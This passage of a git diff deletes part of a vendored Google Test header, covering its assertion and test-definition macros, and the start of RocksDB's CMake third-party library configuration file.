-                            << "\n" << e2 << " evaluates to " << v2;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT2.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT2_(pred_format, v1, v2, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, v1, v2), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED2.  Don't use
-// this in your code.
-#define GTEST_PRED2_(pred, v1, v2, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred2Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             pred, \
-                                             v1, \
-                                             v2), on_failure)
-
-// Binary predicate assertion macros.
-#define EXPECT_PRED_FORMAT2(pred_format, v1, v2) \
-  GTEST_PRED_FORMAT2_(pred_format, v1, v2, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED2(pred, v1, v2) \
-  GTEST_PRED2_(pred, v1, v2, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT2(pred_format, v1, v2) \
-  GTEST_PRED_FORMAT2_(pred_format, v1, v2, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED2(pred, v1, v2) \
-  GTEST_PRED2_(pred, v1, v2, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED3.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3>
-AssertionResult AssertPred3Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3) {
-  if (pred(v1, v2, v3)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT3.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, v1, v2, v3), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED3.  Don't use
-// this in your code.
-#define GTEST_PRED3_(pred, v1, v2, v3, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred3Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3), on_failure)
-
-// Ternary predicate assertion macros.
-#define EXPECT_PRED_FORMAT3(pred_format, v1, v2, v3) \
-  GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED3(pred, v1, v2, v3) \
-  GTEST_PRED3_(pred, v1, v2, v3, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT3(pred_format, v1, v2, v3) \
-  GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED3(pred, v1, v2, v3) \
-  GTEST_PRED3_(pred, v1, v2, v3, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED4.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3,
-          typename T4>
-AssertionResult AssertPred4Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  const char* e4,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3,
-                                  const T4& v4) {
-  if (pred(v1, v2, v3, v4)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ", "
-                            << e4 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3
-                            << "\n" << e4 << " evaluates to " << v4;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT4.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, #v4, v1, v2, v3, v4), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED4.  Don't use
-// this in your code.
-#define GTEST_PRED4_(pred, v1, v2, v3, v4, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred4Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             #v4, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3, \
-                                             v4), on_failure)
-
-// 4-ary predicate assertion macros.
-#define EXPECT_PRED_FORMAT4(pred_format, v1, v2, v3, v4) \
-  GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED4(pred, v1, v2, v3, v4) \
-  GTEST_PRED4_(pred, v1, v2, v3, v4, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT4(pred_format, v1, v2, v3, v4) \
-  GTEST_PRED_FORMAT4_(pred_format, v1, v2, v3, v4, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED4(pred, v1, v2, v3, v4) \
-  GTEST_PRED4_(pred, v1, v2, v3, v4, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED5.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3,
-          typename T4,
-          typename T5>
-AssertionResult AssertPred5Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  const char* e4,
-                                  const char* e5,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3,
-                                  const T4& v4,
-                                  const T5& v5) {
-  if (pred(v1, v2, v3, v4, v5)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ", "
-                            << e4 << ", "
-                            << e5 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3
-                            << "\n" << e4 << " evaluates to " << v4
-                            << "\n" << e5 << " evaluates to " << v5;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT5.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, #v4, #v5, v1, v2, v3, v4, v5), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED5.  Don't use
-// this in your code.
-#define GTEST_PRED5_(pred, v1, v2, v3, v4, v5, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred5Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             #v4, \
-                                             #v5, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3, \
-                                             v4, \
-                                             v5), on_failure)
-
-// 5-ary predicate assertion macros.
-#define EXPECT_PRED_FORMAT5(pred_format, v1, v2, v3, v4, v5) \
-  GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED5(pred, v1, v2, v3, v4, v5) \
-  GTEST_PRED5_(pred, v1, v2, v3, v4, v5, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT5(pred_format, v1, v2, v3, v4, v5) \
-  GTEST_PRED_FORMAT5_(pred_format, v1, v2, v3, v4, v5, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED5(pred, v1, v2, v3, v4, v5) \
-  GTEST_PRED5_(pred, v1, v2, v3, v4, v5, GTEST_FATAL_FAILURE_)
-
-
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-
-// Macros for testing equalities and inequalities.
-//
-//    * {ASSERT|EXPECT}_EQ(expected, actual): Tests that expected == actual
-//    * {ASSERT|EXPECT}_NE(v1, v2):           Tests that v1 != v2
-//    * {ASSERT|EXPECT}_LT(v1, v2):           Tests that v1 < v2
-//    * {ASSERT|EXPECT}_LE(v1, v2):           Tests that v1 <= v2
-//    * {ASSERT|EXPECT}_GT(v1, v2):           Tests that v1 > v2
-//    * {ASSERT|EXPECT}_GE(v1, v2):           Tests that v1 >= v2
-//
-// When they are not, Google Test prints both the tested expressions and
-// their actual values.  The values must be compatible built-in types,
-// or you will get a compiler error.  By "compatible" we mean that the
-// values can be compared by the respective operator.
-//
-// Note:
-//
-//   1. It is possible to make a user-defined type work with
-//   {ASSERT|EXPECT}_??(), but that requires overloading the
-//   comparison operators and is thus discouraged by the Google C++
-//   Usage Guide.  Therefore, you are advised to use the
-//   {ASSERT|EXPECT}_TRUE() macro to assert that two objects are
-//   equal.
-//
-//   2. The {ASSERT|EXPECT}_??() macros do pointer comparisons on
-//   pointers (in particular, C strings).  Therefore, if you use it
-//   with two C strings, you are testing how their locations in memory
-//   are related, not how their content is related.  To compare two C
-//   strings by content, use {ASSERT|EXPECT}_STR*().
-//
-//   3. {ASSERT|EXPECT}_EQ(expected, actual) is preferred to
-//   {ASSERT|EXPECT}_TRUE(expected == actual), as the former tells you
-//   what the actual value is when it fails, and similarly for the
-//   other comparisons.
-//
-//   4. Do not depend on the order in which {ASSERT|EXPECT}_??()
-//   evaluate their arguments, which is undefined.
-//
-//   5. These macros evaluate their arguments exactly once.
-//
-// Examples:
-//
-//   EXPECT_NE(5, Foo());
-//   EXPECT_EQ(NULL, a_pointer);
-//   ASSERT_LT(i, array_size);
-//   ASSERT_GT(records.size(), 0) << "There is no record left.";
-
-#define EXPECT_EQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal:: \
-                      EqHelper<GTEST_IS_NULL_LITERAL_(expected)>::Compare, \
-                      expected, actual)
-#define EXPECT_NE(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperNE, expected, actual)
-#define EXPECT_LE(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperLE, val1, val2)
-#define EXPECT_LT(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperLT, val1, val2)
-#define EXPECT_GE(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperGE, val1, val2)
-#define EXPECT_GT(val1, val2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperGT, val1, val2)
-
-#define GTEST_ASSERT_EQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal:: \
-                      EqHelper<GTEST_IS_NULL_LITERAL_(expected)>::Compare, \
-                      expected, actual)
-#define GTEST_ASSERT_NE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperNE, val1, val2)
-#define GTEST_ASSERT_LE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperLE, val1, val2)
-#define GTEST_ASSERT_LT(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperLT, val1, val2)
-#define GTEST_ASSERT_GE(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperGE, val1, val2)
-#define GTEST_ASSERT_GT(val1, val2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperGT, val1, val2)
-
-// Define macro GTEST_DONT_DEFINE_ASSERT_XY to 1 to omit the definition of
-// ASSERT_XY(), which clashes with some users' own code.
-
-#if !GTEST_DONT_DEFINE_ASSERT_EQ
-# define ASSERT_EQ(val1, val2) GTEST_ASSERT_EQ(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_NE
-# define ASSERT_NE(val1, val2) GTEST_ASSERT_NE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_LE
-# define ASSERT_LE(val1, val2) GTEST_ASSERT_LE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_LT
-# define ASSERT_LT(val1, val2) GTEST_ASSERT_LT(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_GE
-# define ASSERT_GE(val1, val2) GTEST_ASSERT_GE(val1, val2)
-#endif
-
-#if !GTEST_DONT_DEFINE_ASSERT_GT
-# define ASSERT_GT(val1, val2) GTEST_ASSERT_GT(val1, val2)
-#endif
-
-// C-string Comparisons.  All tests treat NULL and any non-NULL string
-// as different.  Two NULLs are equal.
-//
-//    * {ASSERT|EXPECT}_STREQ(s1, s2):     Tests that s1 == s2
-//    * {ASSERT|EXPECT}_STRNE(s1, s2):     Tests that s1 != s2
-//    * {ASSERT|EXPECT}_STRCASEEQ(s1, s2): Tests that s1 == s2, ignoring case
-//    * {ASSERT|EXPECT}_STRCASENE(s1, s2): Tests that s1 != s2, ignoring case
-//
-// For wide or narrow string objects, you can use the
-// {ASSERT|EXPECT}_??() macros.
-//
-// Don't depend on the order in which the arguments are evaluated,
-// which is undefined.
-//
-// These macros evaluate their arguments exactly once.
-
-#define EXPECT_STREQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTREQ, expected, actual)
-#define EXPECT_STRNE(s1, s2) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRNE, s1, s2)
-#define EXPECT_STRCASEEQ(expected, actual) \
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASEEQ, expected, actual)
-#define EXPECT_STRCASENE(s1, s2)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASENE, s1, s2)
-
-#define ASSERT_STREQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTREQ, expected, actual)
-#define ASSERT_STRNE(s1, s2) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRNE, s1, s2)
-#define ASSERT_STRCASEEQ(expected, actual) \
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASEEQ, expected, actual)
-#define ASSERT_STRCASENE(s1, s2)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperSTRCASENE, s1, s2)
-
-// Macros for comparing floating-point numbers.
-//
-//    * {ASSERT|EXPECT}_FLOAT_EQ(expected, actual):
-//         Tests that two float values are almost equal.
-//    * {ASSERT|EXPECT}_DOUBLE_EQ(expected, actual):
-//         Tests that two double values are almost equal.
-//    * {ASSERT|EXPECT}_NEAR(v1, v2, abs_error):
-//         Tests that v1 and v2 are within the given distance to each other.
-//
-// Google Test uses ULP-based comparison to automatically pick a default
-// error bound that is appropriate for the operands.  See the
-// FloatingPoint template class in gtest-internal.h if you are
-// interested in the implementation details.
-
-#define EXPECT_FLOAT_EQ(expected, actual)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<float>, \
-                      expected, actual)
-
-#define EXPECT_DOUBLE_EQ(expected, actual)\
-  EXPECT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<double>, \
-                      expected, actual)
-
-#define ASSERT_FLOAT_EQ(expected, actual)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<float>, \
-                      expected, actual)
-
-#define ASSERT_DOUBLE_EQ(expected, actual)\
-  ASSERT_PRED_FORMAT2(::testing::internal::CmpHelperFloatingPointEQ<double>, \
-                      expected, actual)
-
-#define EXPECT_NEAR(val1, val2, abs_error)\
-  EXPECT_PRED_FORMAT3(::testing::internal::DoubleNearPredFormat, \
-                      val1, val2, abs_error)
-
-#define ASSERT_NEAR(val1, val2, abs_error)\
-  ASSERT_PRED_FORMAT3(::testing::internal::DoubleNearPredFormat, \
-                      val1, val2, abs_error)
-
-// These predicate format functions work on floating-point values, and
-// can be used in {ASSERT|EXPECT}_PRED_FORMAT2*(), e.g.
-//
-//   EXPECT_PRED_FORMAT2(testing::DoubleLE, Foo(), 5.0);
-
-// Asserts that val1 is less than, or almost equal to, val2.  Fails
-// otherwise.  In particular, it fails if either val1 or val2 is NaN.
-GTEST_API_ AssertionResult FloatLE(const char* expr1, const char* expr2,
-                                   float val1, float val2);
-GTEST_API_ AssertionResult DoubleLE(const char* expr1, const char* expr2,
-                                    double val1, double val2);
-
-
-#if GTEST_OS_WINDOWS
-
-// Macros that test for HRESULT failure and success, these are only useful
-// on Windows, and rely on Windows SDK macros and APIs to compile.
-//
-//    * {ASSERT|EXPECT}_HRESULT_{SUCCEEDED|FAILED}(expr)
-//
-// When expr unexpectedly fails or succeeds, Google Test prints the
-// expected result and the actual result with both a human-readable
-// string representation of the error, if available, as well as the
-// hex result code.
-# define EXPECT_HRESULT_SUCCEEDED(expr) \
-    EXPECT_PRED_FORMAT1(::testing::internal::IsHRESULTSuccess, (expr))
-
-# define ASSERT_HRESULT_SUCCEEDED(expr) \
-    ASSERT_PRED_FORMAT1(::testing::internal::IsHRESULTSuccess, (expr))
-
-# define EXPECT_HRESULT_FAILED(expr) \
-    EXPECT_PRED_FORMAT1(::testing::internal::IsHRESULTFailure, (expr))
-
-# define ASSERT_HRESULT_FAILED(expr) \
-    ASSERT_PRED_FORMAT1(::testing::internal::IsHRESULTFailure, (expr))
-
-#endif  // GTEST_OS_WINDOWS
-
-// Macros that execute statement and check that it doesn't generate new fatal
-// failures in the current thread.
-//
-//   * {ASSERT|EXPECT}_NO_FATAL_FAILURE(statement);
-//
-// Examples:
-//
-//   EXPECT_NO_FATAL_FAILURE(Process());
-//   ASSERT_NO_FATAL_FAILURE(Process()) << "Process() failed";
-//
-#define ASSERT_NO_FATAL_FAILURE(statement) \
-    GTEST_TEST_NO_FATAL_FAILURE_(statement, GTEST_FATAL_FAILURE_)
-#define EXPECT_NO_FATAL_FAILURE(statement) \
-    GTEST_TEST_NO_FATAL_FAILURE_(statement, GTEST_NONFATAL_FAILURE_)
-
-// Causes a trace (including the source file path, the current line
-// number, and the given message) to be included in every test failure
-// message generated by code in the current scope.  The effect is
-// undone when the control leaves the current scope.
-//
-// The message argument can be anything streamable to std::ostream.
-//
-// In the implementation, we include the current line number as part
-// of the dummy variable name, thus allowing multiple SCOPED_TRACE()s
-// to appear in the same block - as long as they are on different
-// lines.
-#define SCOPED_TRACE(message) \
-  ::testing::internal::ScopedTrace GTEST_CONCAT_TOKEN_(gtest_trace_, __LINE__)(\
-    __FILE__, __LINE__, ::testing::Message() << (message))
-
-// Compile-time assertion for type equality.
-// StaticAssertTypeEq<type1, type2>() compiles iff type1 and type2 are
-// the same type.  The value it returns is not interesting.
-//
-// Instead of making StaticAssertTypeEq a class template, we make it a
-// function template that invokes a helper class template.  This
-// prevents a user from misusing StaticAssertTypeEq<T1, T2> by
-// defining objects of that type.
-//
-// CAVEAT:
-//
-// When used inside a method of a class template,
-// StaticAssertTypeEq<T1, T2>() is effective ONLY IF the method is
-// instantiated.  For example, given:
-//
-//   template <typename T> class Foo {
-//    public:
-//     void Bar() { testing::StaticAssertTypeEq<int, T>(); }
-//   };
-//
-// the code:
-//
-//   void Test1() { Foo<bool> foo; }
-//
-// will NOT generate a compiler error, as Foo<bool>::Bar() is never
-// actually instantiated.  Instead, you need:
-//
-//   void Test2() { Foo<bool> foo; foo.Bar(); }
-//
-// to cause a compiler error.
-template <typename T1, typename T2>
-bool StaticAssertTypeEq() {
-  (void)internal::StaticAssertTypeEqHelper<T1, T2>();
-  return true;
-}
-
-// Defines a test.
-//
-// The first parameter is the name of the test case, and the second
-// parameter is the name of the test within the test case.
-//
-// The convention is to end the test case name with "Test".  For
-// example, a test case for the Foo class can be named FooTest.
-//
-// Test code should appear between braces after an invocation of
-// this macro.  Example:
-//
-//   TEST(FooTest, InitializesCorrectly) {
-//     Foo foo;
-//     EXPECT_TRUE(foo.StatusIsOK());
-//   }
-
-// Note that we call GetTestTypeId() instead of GetTypeId<
-// ::testing::Test>() here to get the type ID of testing::Test.  This
-// is to work around a suspected linker bug when using Google Test as
-// a framework on Mac OS X.  The bug causes GetTypeId<
-// ::testing::Test>() to return different values depending on whether
-// the call is from the Google Test framework itself or from user test
-// code.  GetTestTypeId() is guaranteed to always return the same
-// value, as it always calls GetTypeId<>() from the Google Test
-// framework.
-#define GTEST_TEST(test_case_name, test_name)\
-  GTEST_TEST_(test_case_name, test_name, \
-              ::testing::Test, ::testing::internal::GetTestTypeId())
-
-// Define this macro to 1 to omit the definition of TEST(), which
-// is a generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_TEST
-# define TEST(test_case_name, test_name) GTEST_TEST(test_case_name, test_name)
-#endif
-
-// Defines a test that uses a test fixture.
-//
-// The first parameter is the name of the test fixture class, which
-// also doubles as the test case name.  The second parameter is the
-// name of the test within the test case.
-//
-// A test fixture class must be declared earlier.  The user should put
-// his test code between braces after using this macro.  Example:
-//
-//   class FooTest : public testing::Test {
-//    protected:
-//     virtual void SetUp() { b_.AddElement(3); }
-//
-//     Foo a_;
-//     Foo b_;
-//   };
-//
-//   TEST_F(FooTest, InitializesCorrectly) {
-//     EXPECT_TRUE(a_.StatusIsOK());
-//   }
-//
-//   TEST_F(FooTest, ReturnsElementCountCorrectly) {
-//     EXPECT_EQ(0, a_.size());
-//     EXPECT_EQ(1, b_.size());
-//   }
-
-#define TEST_F(test_fixture, test_name)\
-  GTEST_TEST_(test_fixture, test_name, test_fixture, \
-              ::testing::internal::GetTypeId<test_fixture>())
-
-}  // namespace testing
-
-// Use this function in main() to run all tests.  It returns 0 if all
-// tests are successful, or 1 otherwise.
-//
-// RUN_ALL_TESTS() should be invoked after the command line has been
-// parsed by InitGoogleTest().
-//
-// This function was formerly a macro; thus, it is in the global
-// namespace and has an all-caps name.
-int RUN_ALL_TESTS() GTEST_MUST_USE_RESULT_;
-
-inline int RUN_ALL_TESTS() {
-  return ::testing::UnitTest::GetInstance()->Run();
-}
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_H_
diff --git a/thirdparty/rocksdb/thirdparty.inc b/thirdparty/rocksdb/thirdparty.inc
deleted file mode 100644
index a364d1d..0000000
--- a/thirdparty/rocksdb/thirdparty.inc
+++ /dev/null
@@ -1,254 +0,0 @@
-# Edit definitions below to specify paths to include files and libraries of all 3rd party libraries
-
-#
-# Edit these lines to set defaults for use of external libraries
-#
-set(USE_GFLAGS_DEFAULT 0)        # GFLAGS is disabled by default, enable with -DGFLAGS=1 cmake command line agrument
-set(USE_SNAPPY_DEFAULT 0)        # SNAPPY is disabled by default, enable with -DSNAPPY=1 cmake command line agrument
-set(USE_LZ4_DEFAULT 0)           # LZ4 is disabled by default, enable with -DLZ4=1 cmake command line agrument
-set(USE_ZLIB_DEFAULT 0)          # ZLIB is disabled by default, enable with -DZLIB=1 cmake command line agrument
-set(USE_XPRESS_DEFAULT 0)        # XPRESS is disabled by default, enable with -DXPRESS=1 cmake command line agrument
-
-#
-# This example assumes all the libraries locate in directories under THIRDPARTY_HOME environment variable
-# Set environment variable THIRDPARTY_HOME to point to your third party libraries home (Unix style dir separators)
-# or change the paths below to reflect where the libraries actually reside
-#
-set (THIRDPARTY_LIBS "")         # Initialization, don't touch
-
-#
-# Edit these 4 lines to define paths to GFLAGS
-#
-set(GFLAGS_HOME $ENV{THIRDPARTY_HOME}/Gflags.Library)
-set(GFLAGS_INCLUDE ${GFLAGS_HOME}/inc/include)
-set(GFLAGS_LIB_DEBUG ${GFLAGS_HOME}/bin/debug/amd64/gflags.lib)
-set(GFLAGS_LIB_RELEASE ${GFLAGS_HOME}/bin/retail/amd64/gflags.lib)
-
-# ================================================== GFLAGS ==================================================
-#
-# Don't touch these lines
-#
-if (DEFINED GFLAGS)
-  set(USE_GFLAGS ${GFLAGS})
-else ()
-  set(USE_GFLAGS ${USE_GFLAGS_DEFAULT})
-endif ()
-
-if (${USE_GFLAGS} EQUAL 1)
-  message(STATUS "GFLAGS library is enabled")
-  
-  if(DEFINED ENV{GFLAGS_INCLUDE})
-    set(GFLAGS_INCLUDE $ENV{GFLAGS_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{GFLAGS_LIB_DEBUG})
-    set(GFLAGS_LIB_DEBUG $ENV{GFLAGS_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{GFLAGS_LIB_RELEASE})
-    set(GFLAGS_LIB_RELEASE $ENV{GFLAGS_LIB_RELEASE})
-  endif()
-  
-  set(GFLAGS_CXX_FLAGS -DGFLAGS=gflags)
-  set(GFLAGS_LIBS debug ${GFLAGS_LIB_DEBUG} optimized ${GFLAGS_LIB_RELEASE})
-
-  add_definitions(${GFLAGS_CXX_FLAGS})
-  include_directories(${GFLAGS_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${GFLAGS_LIBS})
-else ()
-  message(STATUS "GFLAGS library is disabled")
-endif ()
-
-# ================================================== SNAPPY ==================================================
-#
-# Edit these 4 lines to define paths to Snappy
-#
-set(SNAPPY_HOME $ENV{THIRDPARTY_HOME}/Snappy.Library)
-set(SNAPPY_INCLUDE ${SNAPPY_HOME}/inc/inc)
-set(SNAPPY_LIB_DEBUG ${SNAPPY_HOME}/bin/debug/amd64/snappy.lib)
-set(SNAPPY_LIB_RELEASE ${SNAPPY_HOME}/bin/retail/amd64/snappy.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED SNAPPY)
-  set(USE_SNAPPY ${SNAPPY})
-else ()
-  set(USE_SNAPPY ${USE_SNAPPY_DEFAULT})
-endif ()
-
-if (${USE_SNAPPY} EQUAL 1)
-  message(STATUS "SNAPPY library is enabled")
-  
-  if(DEFINED ENV{SNAPPY_INCLUDE})
-    set(SNAPPY_INCLUDE $ENV{SNAPPY_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{SNAPPY_LIB_DEBUG})
-    set(SNAPPY_LIB_DEBUG $ENV{SNAPPY_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{SNAPPY_LIB_RELEASE})
-    set(SNAPPY_LIB_RELEASE $ENV{SNAPPY_LIB_RELEASE})
-  endif()
-  
-  set(SNAPPY_CXX_FLAGS -DSNAPPY)
-  set(SNAPPY_LIBS debug ${SNAPPY_LIB_DEBUG} optimized ${SNAPPY_LIB_RELEASE})
-
-  add_definitions(${SNAPPY_CXX_FLAGS})
-  include_directories(${SNAPPY_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${SNAPPY_LIBS})
-else ()
-  message(STATUS "SNAPPY library is disabled")
-endif ()
-
-# ================================================== LZ4 ==================================================
-#
-# Edit these 4 lines to define paths to LZ4
-#
-set(LZ4_HOME $ENV{THIRDPARTY_HOME}/LZ4.Library)
-set(LZ4_INCLUDE ${LZ4_HOME}/inc/include)
-set(LZ4_LIB_DEBUG ${LZ4_HOME}/bin/debug/amd64/lz4.lib)
-set(LZ4_LIB_RELEASE ${LZ4_HOME}/bin/retail/amd64/lz4.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED LZ4)
-  set(USE_LZ4 ${LZ4})
-else ()
-  set(USE_LZ4 ${USE_LZ4_DEFAULT})
-endif ()
-
-if (${USE_LZ4} EQUAL 1)
-  message(STATUS "LZ4 library is enabled")
-  
-  if(DEFINED ENV{LZ4_INCLUDE})
-    set(LZ4_INCLUDE $ENV{LZ4_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{LZ4_LIB_DEBUG})
-    set(LZ4_LIB_DEBUG $ENV{LZ4_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{LZ4_LIB_RELEASE})
-    set(LZ4_LIB_RELEASE $ENV{LZ4_LIB_RELEASE})
-  endif()
-  
-  set(LZ4_CXX_FLAGS -DLZ4)
-  set(LZ4_LIBS debug ${LZ4_LIB_DEBUG} optimized ${LZ4_LIB_RELEASE})
-
-  add_definitions(${LZ4_CXX_FLAGS})
-  include_directories(${LZ4_INCLUDE})
-  set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${LZ4_LIBS})
-else ()
-  message(STATUS "LZ4 library is disabled")
-endif ()
-
-# ================================================== ZLIB ==================================================
-#
-# Edit these 4 lines to define paths to ZLIB
-#
-set(ZLIB_HOME $ENV{THIRDPARTY_HOME}/ZLIB.Library)
-set(ZLIB_INCLUDE ${ZLIB_HOME}/inc/include)
-set(ZLIB_LIB_DEBUG ${ZLIB_HOME}/bin/debug/amd64/zlib.lib)
-set(ZLIB_LIB_RELEASE ${ZLIB_HOME}/bin/retail/amd64/zlib.lib)
-
-#
-# Don't touch these lines
-#
-if (DEFINED ZLIB)
-  set(USE_ZLIB ${ZLIB})
-else ()
-  set(USE_ZLIB ${USE_ZLIB_DEFAULT})
-endif ()
-
-if (${USE_ZLIB} EQUAL 1)
-  message(STATUS "ZLIB library is enabled")
-
-  if(DEFINED ENV{ZLIB_INCLUDE})
-    set(ZLIB_INCLUDE $ENV{ZLIB_INCLUDE})
-  endif()
-  
-  if(DEFINED ENV{ZLIB_LIB_DEBUG})
-    set(ZLIB_LIB_DEBUG $ENV{ZLIB_LIB_DEBUG})
-  endif()
-
-  if(DEFINED ENV{ZLIB_LIB_RELEASE})
-    set(ZLIB_LIB_RELEASE $ENV{ZLIB_LIB_RELEASE})
-  endif()
-  
-  set(ZLIB_CXX_FLAGS -DZLIB)
-  set(ZLIB_LIBS debug ${ZLIB_LIB_DEBUG} optimized ${ZLIB_LIB_RELEASE})
-
-  add_definitions(${ZLIB_CXX_FLAGS})
-  include_directories(${ZLIB_INCLUDE})
